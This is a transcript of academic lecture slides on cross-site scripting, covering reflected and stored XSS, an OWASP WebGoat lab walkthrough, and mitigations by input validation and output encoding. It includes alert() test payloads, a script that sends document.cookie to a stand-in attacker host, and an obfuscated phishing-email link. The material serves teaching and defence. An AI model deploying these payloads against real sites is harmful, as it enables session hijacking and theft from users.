Cross Site Scripting (XSS)

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009
Webgoat.
Cross Site Scripting (XSS)
Cross-Site Scripting CSCD 498/539 Secure Coding Principles Amazing Legion of Fuzzy Backdoor Intruder Worms Bryan Smith Allen Greaves Zach Moore Rebecca.
Past, Present and Future By Eoin Keary and Jim Manico
Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
© 2009 IBM Corporation IBM Rational Application Security The Bank Job Utilizing XSS Vulnerabilities Adi Sharabani IBM Rational Application Security Research.
WEB DESIGN TABLES, PAGE LAYOUT AND FORMS. Page Layout Page Layout is an important part of web design Why do you think your page layout is important?
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Prevent Cross-Site Scripting (XSS) attack
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
WEB SPOOFING by Miguel and Ngan. Content Web Spoofing Demo What is Web Spoofing How the attack works Different types of web spoofing How to spot a spoofed.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
© All rights reserved. Zend Technologies, Inc. PHP Security Kevin Schroeder Zend Technologies.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
Cross-Site Attacks James Walden Northern Kentucky University.
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.
Foundations of Network and Computer Security J J ohn Black CSCI 6268/TLEN 5550, Spring 2013.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
XSS 101 Jason Clark 12/20.
CSC 482/582: Computer Security
Google’s Gruyere1 : An XSS Example Presented by: Terry Gregory
Group 18: Chris Hood Brett Poche
CSCE 548 Student Presentation Ryan Labrador
An Introduction to Web Application Security
Tonga Institute of Higher Education IT 141: Information Systems
TOPIC: Web Security (Part-4)
World Wide Web policy.
Cross-Site Scripting Travis Deyarmin.
CS 371 Web Application Programming
CSC 482/582: Computer Security
Tonga Institute of Higher Education IT 141: Information Systems
Web Systems Development (CSC-215)
Web Security Advanced Network Security Peter Reiher August, 2014
Tonga Institute of Higher Education IT 141: Information Systems
CSC 482/582: Computer Security
Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems
Exploring DOM-Based Cross Site Attacks
Cross-Site Scripting Attack (XSS)
Cross Site Request Forgery (CSRF)
Presentation transcript:

Cross Site Scripting (XSS) Charles Frank Northern Kentucky University

Cross-Site Scripting (XSS) Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing. XSS used to obtain session ID for Bank site (transfer money to attacker) Shopping site (buy goods for attacker) E-mail Key ideas Attacker sends malicious code to server. Victim’s browser loads code from server and runs it. March 4, 2009 SIGCSE

Vulnerability Trends for 2006 Trend data from MITRE CWE. March 4, 2009 SIGCSE

Anatomy of an XSS Attack User logs into legitimate site. Site sends user authentication cookie. Attacker sends user XSS attack containing injected code. User clicks on XSS link in email, web, IM. Browser contacts vulnerable URL at legitimate site with cookie in URL. Legitimate site returns injected code in web page. Browser runs injected code, which accesses evil site with cookie in URL. Evil site records user cookie. Attacker uses cookie to authenticate to legitimate site as user. March 4, 2009 SIGCSE

XSS Example Client browser sends an error message to the web server. https://example.com/error.php?message=Sorry%2C+an +error+occurred March 4, 2009 SIGCSE

XSS Example The error message is “Reflected” back from the Web server to the client in a web page. <p>Sorry, an error occurred.</p> March 4, 2009 SIGCSE

XSS Example We can replace the error with JavaScript https://example.com/error.php?message=<script>alert(‘xss’);</script> March 4, 2009 SIGCSE

Proof of Concept March 4, 2009 SIGCSE

Exploiting the Vulnerability User logins in and is issued a cookie Attacker feed the URL to user https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script> March 4, 2009 SIGCSE

Exploiting the Vulnerability The server responds by sending the user a web page that runs the Java script. The code makes a request to attacker.com containing the session token. March 4, 2009 SIGCSE

Exploiting the Vulnerability The attacker monitors requests to attacker.com. He uses the captured session token to gain access to the user’s personal information and perform actions as the “user”. March 4, 2009 SIGCSE

Email Snare From: “Example Customer Services” To: “J Q Customer” Dear Valued Customer, You have been selected to participate in our customer survey. Please complete our easy 5 question survey, and return we will credit $5 to your account. March 4, 2009 SIGCSE

Email Snare To access the survey, please log in to your account using your usual bookmark, and then click on the following link: https://example.com/%65%72%72...?message%3d...att%61%63%6b.com...docum%65..%63ookie... March 4, 2009 SIGCSE

Reassuring Email The link contains the correct domain name (unlike phishing). The URL has been obfuscated It uses https March 4, 2009 SIGCSE

Reflected XSS Reflected XSS Injected script returned by one-time message. Requires tricking user to click on link. Non-persistent. Only works when user clicks. March 4, 2009 SIGCSE

Anatomy of an XSS Attack Web Server 8. Attacker hijacks user session. 1. Login Attacker User 2. Cookie 5. XSS URL 3. XSS Attack 6. Page with injected code. 7. Browser runs injected code. 4. User clicks on XSS link. Evil site saves ID. March 4, 2009 SIGCSE

XSS URL Examples http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script> http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script> http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1 http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E March 4, 2009 SIGCSE

Stored XSS Stored XSS Injected script stored in comment, message, etc. Requires ability to insert malicious code into web documents (comments, reviews, etc.) Persistent until message deleted. March 4, 2009 SIGCSE

Stored XSS Auction site that allows buyers to post questions and sellers to post responses. If an attacker can post a question containing a script, the attacker could get a user to bid without intending to or get the seller to close the auction and accept the attacker’s low bid. March 4, 2009 SIGCSE

Why does XSS Work? Same-Origin Policy Vulnerable Server Program Browser only allows Javascript from site X to access cookies and other data from site X. Attacker needs to make attack come from site X. Vulnerable Server Program Any program that returns user input without filtering out dangerous code. March 4, 2009 SIGCSE

XSS Attacks MySpace worm (October 2005) Paypal (2006) BBC, CBS (2006) When someone viewed Samy’s profile: Set him as friend of viewer. Incorporated code in viewer’s profile. Paypal (2006) XSS redirect used to steal money from Paypal users in a phishing scam. BBC, CBS (2006) By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department. March 4, 2009 SIGCSE

Impact of XSS Attackers can hijack user accounts. Attackers can hijack admin accounts too. Attacker can do anything a user can do. Difficult to track down source of attack. March 4, 2009 SIGCSE

Mitigating XSS Disallow HTML input Allow only safe HTML tags Filter output Replace HTML special characters in output ex: replace < with < and > with > also replace (, ), #, & Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for. March 4, 2009 SIGCSE

XSS Problem XSS is a complex problem that is not going away anytime soon. The browser is insecure by design. It understand JavaScript. It isn’t the browsers job to determine what code is good or bad. Disabling scripting seriously dampens the user’s browsing experience. March 4, 2009 SIGCSE

Cross-Site Scripting Demo March 4, 2009 SIGCSE

OWASP WebGoat http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project WebGoat 5.2 Standard WebGoat 5.2 Developer Run webgoat.bat to start Tomcat Enter http://localhost/WebGoat/attack in your browser March 4, 2009 SIGCSE

OWASP WebGoat Username: guest Password: guest Start WebGoat March 4, 2009 SIGCSE

Reflected XSS Attacks Solution: View Page Source Enter <script>alert('Bang!')</script> for the PIN value View Page Source Edit | Find | Bang March 4, 2009 SIGCSE

Stage 6: Blocked Reflected XSS You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java. Alter the method getRequestParameter. The body of the mehtod should look something like this: March 4, 2009 SIGCSE

Stage 6: Blocked Reflected XSS String regex = "[\\s\\w-,]*"; String parameter = s.getParser().getRawParameter(name); Pattern pattern = Pattern.compile(regex); validate(parameter, pattern); return parameter; March 4, 2009 SIGCSE

Stage 1: Stored XSS First Login as Tom with tom as password. Select Tom from the list and click on the View Profile Button. Now should appear Tom's Profile. March 4, 2009 SIGCSE

Stage 1: Stored XSS Click on the 'Edit Profile' Button and try an XSS attack on the street field. For example: <script>alert("Got Ya");</script> Click on the UpdateProfile Button and Log out. March 4, 2009 SIGCSE

Stage 1: Stored XSS Now log in as Jerry with jerry as password. Select from the the list the profile of tom and hit the ViewProfile Button. March 4, 2009 SIGCSE

Stage 2: Blocked Stored XSS using Input Validation Solution: You have to alter the method parseEmployeeProfile in the class UpdateProfile.java which is placed in the package org.owasp.webgoat.lessons.CrossSiteScripting The place to code is marked! March 4, 2009 SIGCSE

Stage 2: Blocked Stored XSS using Input Validation String regex = "[\\s\\w-,]*"; String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+ startDate+ccn+disciplinaryActionDate+ disciplinaryActionNotes+personalDescription; Pattern pattern = Pattern.compile(regex); validate(stringToValidate, pattern); March 4, 2009 SIGCSE

Stage 2: Blocked Stored XSS using Input Validation This validation allows following: \s = whitespace: \t\n\x0B\f\r \w = word: a-zA-Z_0-9 and the characters - and , Use of any other character will throw a Validation Exception. March 4, 2009 SIGCSE

Stage 3: Stored XSS Revisted Log in as David with david as password. Choose Bruce from the List and click on the 'ViewProfile' Button. March 4, 2009 SIGCSE

Stage 4: Blocked XSS using Output Encoding You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder. This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting class. Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done. March 4, 2009 SIGCSE

XSS References March 4, 2009 SIGCSE

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.